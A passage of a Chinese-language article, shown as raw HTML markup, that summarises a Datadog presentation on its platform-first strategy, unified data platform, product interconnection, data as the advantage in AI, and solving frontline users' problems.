Calibri;color:black;mso-font-kerning:0pt;">的成功源于其独特的战略——首先构建统一数据平台，然后在此基础上开发各种产品。尽管这种方法最初被认为是错误的选择，甚至给公司融资带来困难，但最终证明这种广泛的平台方法奠定了<span lang="EN-US">Datadog</span>在市场上成功的基础。统一平台使<span lang="EN-US">Datadog</span>能够快速开发新产品，无缝整合各种功能，并为客户提供全面的可观测性解决方案。平台的强大功能还为<span lang="EN-US">AI</span>创新奠定了基础，使<span lang="EN-US">Datadog</span>在<span lang="EN-US">AI</span>时代保持领先地位。<span lang="EN-US"><o:p></o:p></span></span></p><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">的发展逻辑可以概括为：<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">- </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">识别市场需求：发现监控领域存在信息孤岛问题<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">- </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">提出解决方案：创建统一数据平台<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">- </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">持续扩展：从基础设施监控扩展到应用、安全等领域<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">- </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">不断创新：引入新技术和功能，如<span lang="EN-US">APM</span>、云安全等<span lang="EN-US"><o:p></o:p></span></span></section><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">- </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">整合优化：将各种功能整合<span lang="EN-US">into.</span>全面可观测性平台<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">从技术到业务的反向架构旅程<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">因为我们无处不在，被所有人使用，我们与客户有着非常广泛的接触面，这反过来使我们能够在这个接触面内为他们解决越来越大的问题，同时受益于我们共享的统一平台，使我们能够更快地进入这些新领域。<span lang="EN-US">&#34;</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000728" data-ratio="0.5461767626613704" data-s="300,640" data-type="png" data-w="1007" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=8deec48e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDUT1TE7lIOkuTmSO4f8FGfdAln71dHtTGK53riccVEAej9sbz5Z6LhwQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">【参】<span lang="EN-US">Datadog</span>的架构旅程，基于共享统一平台，从技术基础开始<span lang="EN-US">,</span>逐步向上层数据、应用发展<span lang="EN-US">,</span>最终实现业务价值。每个阶段都建立在前一个阶段的基础之上<span lang="EN-US">,</span>形成了一个完整的、自底向上的架构旅程。这种方法的优势在于<span lang="EN-US">:</span>确保了强大的技术基础，允许灵活的数据处理和分析，支持多样化的应用开发，最终能够提供针对性的业务服务。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">1.3 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">数据整合，哪里还有孤岛</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">只要你足够好，你就能代表”单一真相源“<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">”<span lang="EN-US">Datadog</span>能够从多个源头收集数据并提供一致的信息视图，这有助于打破组织内部的信息孤岛，确保所有用户都能获取相同且准确的数据，从而成为可信的‘单一真相源’。“<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000729" data-ratio="0.5619425173439049" data-s="300,640" data-type="png" data-w="1009" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5a43a130&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDvGSZZOeC9GxoOthrt3XEsH2xDjeG8rkp1dINXQrXBW5tiaEI78wIEJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">平台优先其实是最优策略<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">统一数据平台允许所有客户在不同产品之间无缝导航。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000730" data-ratio="0.5308764940239044" data-s="300,640" data-type="png" data-w="1004" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=36a19b9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDNvV5loUqrgMMOOSpYH5J8g7mrqvaZIicNfqevO8Tytfqiba05ia6FdnsQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="margin-bottom: 8px;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">以<span lang="EN-US">APM</span></span><span style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">为例，讲述产品扩张</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">的基本逻辑：</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">1) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">识别需求：需要开发<span lang="EN-US">APM</span>产品<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">2) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">利用现有资源：使用已建立的组件和平台<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">3) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">扩展功能：对现有平台和代理进行小规模扩展<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">4) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">快速开发：基于相同平台加速产品开发<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">5) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">提供价值：统一数据平台实现产品间无缝导航<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">6) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">解决问题：帮助客户更有效地解决关键问题<span lang="EN-US"><o:p></o:p></span></span></section><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">7) </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">打破孤岛：消除产品之间的隔离，提高整体效率<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">1.4 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">产品互联，我就是你的生态</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">有好平台，才能精益和敏捷<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">建立平台优先的策略确实需要更多投资，但这种投资让我们能够更快地行动并构建更好的产品。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000731" data-ratio="0.5534653465346535" data-s="300,640" data-type="png" data-w="1010" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=56460553&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDd1OopMO2PvSXjycCRBicPNsHDibdjzvlQZhaE1aM365kHvNNalWYH2UQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">DataDog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">采用平台优先的策略来开发产品。公司一半的工程师致力于平台开发，另一半专注于各种产品。这种策略使得产品团队能够保持精简高效。例如，年收入<span lang="EN-US">5</span>亿美元的日志管理业务只需<span lang="EN-US">30</span>名工程师，而云成本管理解决方案仅用<span lang="EN-US">10</span>名工程师就快速完成。这种高效率归功于强大的统一数据平台，使得各产品紧密互联。通过对数据进行透视和处理，<span lang="EN-US">DataDog</span>能够解决新问题，开发新产品，如云安全解决方案和软件交付分析。这种平台与产品之间的良性循环效应使公司能够不断创新，为客户提供更大价值。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">客户越来越倾向可以互相协作的产品<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“这就是平台的力量，由于构建在平台之上，这些功能自然而然地相互连接。”<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“只要这些新产品能够继续反映企业的运作方式并与现有产品互联，就会受到客户的欢迎。”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000732" data-ratio="0.5757884028484231" data-s="300,640" data-type="png" data-w="983" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ae93d205&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDYIzjNUf8UHkfFKMvic2GDl0hUI4AwqmYRsvSo5bIBFUOAEznh5SH0lw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">演讲者</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:red;mso-font-kerning:0pt;">强调了产品的互联性对于客户的重要性，即各种工具和服务需要能够无缝协作以提高效率和解决问题</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">。通过持续推出新产品并确保它们能够互相连接，企业能够打破沟通和技术上的孤岛效应，实现更加协调一致的工作流程。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">1.5 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">数据是</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;">AI</span></strong><strong><span style="font-size:
14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">的最终优势</span></strong><strong><span lang="EN-US" style="font-size:
14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#5B9BD5;mso-font-kerning:0pt;">干净的数据是</span></strong><strong><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#5B9BD5;mso-font-kerning:0pt;">AI</span></strong><strong><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#5B9BD5;mso-font-kerning:0pt;">的最终优势</span></strong><strong><span lang="EN-US" style="font-size:
12.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#5B9BD5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">我们认为，<span lang="EN-US">AI</span>最后的差异化优势不在于你拥有多少<span lang="EN-US">GPU</span>或使用多么复杂的模型。当然，这些很重要，但还不够。我们认为，最后的优势最终在于可用于训练、微调、推理的数据，以及大规模管理这些数据的能力。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">因为我们是客户关键工作流程的一部分，他们不断向我们发送的数据可以说是他们整个技术栈中最丰富、最干净和最准确的数据。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000733" data-ratio="0.5155778894472361" data-s="300,640" data-type="png" data-w="995" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=7e1c369a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDdm2xb9y1BJ1jEwQ5lp3nknE3z0nlqQEicV4DwdCSwoB1m0dXjMH9ibtA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="margin-bottom: 8px;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">演讲者的基本逻辑：<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">1) </span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">独特的市场位置 → 获取多样化数据<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">2) </span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">多样化数据 → 深入理解客户需求和上下文<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">3) </span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">深入理解 → 构建更好的<span lang="EN-US">AI</span>解决方案<span lang="EN-US"><o:p></o:p></span></span></section><section style="margin-bottom: 8px;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">4) </span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">持续创新 → 获取更多数据和解决更多问题<span lang="EN-US"><o:p></o:p></span></span></section><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">5) </span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">循环往复 → 保持竞争优势<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">如何打赢与复杂性的竞赛？<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">这是关于使我们的客户变得更好、更快和更高效，让客户的力量提高一个数量级。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000734" data-ratio="0.5119047619047619" data-s="300,640" data-type="png" data-w="1008" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=454f8c75&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDuoTEzQJU37l78tpjvvkuV8ULUs9sQNSZfjnx6qxMCjQU5BUS9V3ayw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;CLOSING
THE LOOP&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">体现了<span lang="EN-US">Datadog</span>致力于提供一个完整的、自动化的、以客</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">户为中心的数据驱动决策和行动平台。</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">这个概念强调了从数据到洞察</span><span lang="EN-US" style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">,</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">再到行动的完整过程</span><span lang="EN-US" style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">,</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">并通过自动化来持续优化这个过程。</span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">通过预防问题而不是被动响应，以及尽可能自动化基础工作，公司旨在赢得与复杂性的竞赛。演讲者认为公司有独特优势来实现这一目标，包括纯<span lang="EN-US">SaaS</span>模式、对客户工作流程的深入了解、丰富的数据集以及<span lang="EN-US">AI</span>和机器学习的发展。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">主题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">2</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">：解决一线用户的问题优先</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">2.1 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">从一线用户问题出发，妥妥的群众路线</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">从问题出发构建解决方案<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“我们并不说我们在构建产品，我们说我们在为客户解决问题。”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000735" data-ratio="0.5619425173439049" data-s="300,640" data-type="png" data-w="1009" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=d3b5469f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDOnp4ASmjlcMlIdAjhWHZdYQSzaIoVr6JPCdurmChO3jRhf7vhqCdbA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Michael Whedon</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">讲述了<span lang="EN-US">Datadog</span>如何</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">通过以客户问题为导向来构建产品</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">。</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:red;mso-font-kerning:0pt;">公司首先搭建了一个平台，整合所有数据、指标和事件，再基于这些数据决定如何为客户开发解决方案</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
